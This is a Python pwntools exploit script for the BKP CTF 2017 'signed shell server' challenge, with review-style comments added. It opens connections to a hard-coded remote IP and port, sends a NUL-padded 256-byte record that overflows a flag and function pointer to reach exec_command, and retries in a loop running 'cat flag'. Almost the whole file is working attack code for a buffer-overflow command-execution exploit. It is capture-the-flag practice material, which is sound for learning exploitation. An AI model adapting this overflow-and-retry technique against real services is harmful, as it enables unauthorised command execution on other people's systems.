Sample pwntool usage
# Credits to https://losfuzzys.github.io/writeup/2017/02/27/bkpctf2017-signed-shell-server/
import os
import random
import string

from pwn import *  # noqa
# Target binary; the exploit needs the low byte of exec_command's address
# (per the writeup credited above, this is the byte the overflow should land
# on).
velf = ELF("./sss")
exec_command_addr = velf.symbols['exec_command']
last_byte = exec_command_addr & 0xff
log.info("last byte of exec_command 0x{:x}".format(last_byte))

# Environment for a *local* run of the binary (see make_vp): preload the
# libcrypto shipped alongside the challenge. Unused when talking to the
# remote service. Presumably matches the library the challenge was built
# against -- confirm before relying on it for local offsets.
env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libcrypto.so.1.0.0")}
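def make_vp(host="54.202.7.144", port=9875, local=False):
    """Open a fresh tube to the target and return it.

    By default this connects to the remote challenge service at
    ``host:port`` (the original hard-coded endpoint). With ``local=True`` it
    instead spawns ``./sss_dealarmed`` under the LD_PRELOAD ``env`` defined
    at module level -- this is the commented-out local-debugging path of the
    original, kept reachable behind a flag (``sss_dealarmed`` is presumably
    the challenge binary with its alarm() patched out; verify locally).

    Returns a pwntools tube (``remote`` or ``process``); network or spawn
    failures propagate as pwntools exceptions.
    """
    if local:
        return process("./sss_dealarmed", env=env)
    return remote(host, port)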
# less verbosity for pwntools
# NOTE(review): "error" drops everything below ERROR from this point on, which
# should include the log.info() call inside the loop below -- only messages
# emitted before this line (e.g. the last_byte info above) are shown. Confirm
# against the pwntools version in use.
context.log_level = "error"
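def _attempt(vp, cmd):
    """Drive one exploit attempt over the tube *vp* and return the response.

    Picks menu option 2, sends *cmd* as a 256-byte record padded with NUL
    bytes (the padding overflows the use_md5 flag and, through it, the
    adjacent function pointer -- see the writeup credited at the top of the
    file), answers the following prompt with a dummy value and returns
    whatever the server sends back within 0.5 s. The result may be empty
    when the attempt did not land; pwntools tube errors (EOF, timeouts)
    propagate to the caller.
    """
    vp.recvuntil(">_")
    vp.sendline("2")
    vp.recvuntil(">_")
    # Record layout: command, newline, NUL terminator, NUL padding to 256.
    # ljust never truncates, matching the original "\x00" * (256 - len) pad.
    payload = "{}\n\x00".format(cmd).ljust(256, "\x00")
    vp.send(payload)
    vp.recvuntil(">_")
    vp.sendline("wurscht")
    return vp.recvrepeat(timeout=0.5)


while True:
    # Five random letters appended to the command, presumably so each
    # attempt's output can be told apart. This is a marker, not a secret,
    # so `random` is adequate. ascii_letters replaces the Python-2-only,
    # locale-dependent string.letters.
    marker = "".join(random.sample(string.ascii_letters, 5))
    cmd = "cat flag; echo " + marker
    vp = make_vp()
    # For local debugging: gdb.attach(vp, gdbscript)
    try:
        line = _attempt(vp, cmd)
        # context.log_level is set to "error" above, which filters
        # log.info(); print directly so the response (and the flag) is
        # actually visible on the terminal.
        print("got line: " + repr(line))
    except Exception:
        # Best-effort retry: a dropped connection or EOF simply means this
        # attempt failed. Catching Exception rather than a bare `except`
        # lets KeyboardInterrupt through so the loop can be stopped.
        pass
    finally:
        vp.close()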